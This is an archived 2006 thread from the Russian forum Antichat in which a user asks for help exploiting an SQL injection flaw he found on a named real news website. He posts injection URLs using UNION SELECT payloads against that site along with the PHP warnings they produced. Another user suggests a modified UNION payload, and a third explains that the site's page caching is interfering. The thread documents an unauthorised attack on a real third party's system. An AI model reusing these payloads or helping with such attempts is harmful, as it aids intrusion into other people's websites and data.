Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   SQL Injection HELP! (https://forum.antichat.xyz/showthread.php?t=14630)

MetallicA 18.02.2006 04:48

SQL Injection HELP!
 
Всем привет! Юзал один сайт дабы вроди нащёл помеху
http://rustavi2.com.ge/news_textg.php?id_news=00'
вылазиют разные варнинги но дальше не могу использовать эту помеху) Юзаю так:
http://rustavi2.com.ge/news_textg.php?id_news=00'%20UNION%20select%20null ,null%20/*
В результате (Делал по разному но таже самая фигня)
/*
Warning: fopen(cache/news_textg.phpid_news=00\'%20UNION%20select%20null ,null%20/*.cache): failed to open stream: No such file or directory in /www/rustavi2.com/doc/includes/cache.php on line 24
*/
Чё за фигня? или я чтото не так делаю?

vfDcs 18.02.2006 07:57

попробуй так:
http://rustavi2.com.ge/news_textg.ph...,1,1,1,1,1,1/*

fucker"ok 18.02.2006 14:11

Цитата:

Warning: fopen(cache/news_textg.phpid_news=00\'%20UNION%20select%20null ,null%20/*.cache): failed to open stream: No such file or directory in /www/rustavi2.com/doc/includes/cache.php on line 24
Это значит они используют кеширование страниц, чтобы каждый раз не формировать страницу заново.
Твоего вывода в кеше нет, и он страницу не формирует по новой почему-то...
Помоему так :]


Время: 18:33